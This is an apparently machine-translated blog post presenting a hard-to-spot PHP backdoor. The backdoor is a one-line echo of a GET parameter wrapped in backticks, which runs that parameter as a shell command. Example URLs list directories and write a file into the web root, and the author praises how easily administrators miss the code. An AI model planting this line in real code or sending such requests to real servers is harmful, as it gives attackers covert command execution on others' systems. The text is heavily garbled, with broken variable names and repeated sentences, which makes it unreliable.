Parsing a PHP backdoor code that is hard to be found. When I see a piece of code by accident, it seems that there is no problem. it is indeed a fatal backdoor code. here I use an anti-code that is not followed by a general PHPer ', when I see a section containing an anti-apostrophes by accident, it seems that there is no problem, but it is actually a fatal backdoor code. here I use an anti-apostrophes that are not very concerned by a general PHPer ', the string contained by the anti-code. it is equivalent to the shell_exec function.
The pseudoassembly is good and can be easily ignored by administrators.
$ SelfNums = $ _ GET ['R']; if (isset ($ selfNums) {echo '$ selfNums ';}
When I see this code, I think everyone will say that there is no problem, but careful friends will also find that the following variables are wrapped by a symbol. since it is a variable, why,
It is not a single quotation mark. this is the key. This symbol is a key under Esc (located in the exclamation point! ),
Echo 'system command '; achieves the same effect as system ();
If you do not believe it, you can test it.
Http: // 127.0.0.1/t. php? R = dirList directories
Http: // 127.0.0.1/t. php? R = echo I am Ma er> D: \ web \ 90sec. php
I have successfully tested appserv and the VM.
Taobao', which is included in the anti-apostrophes...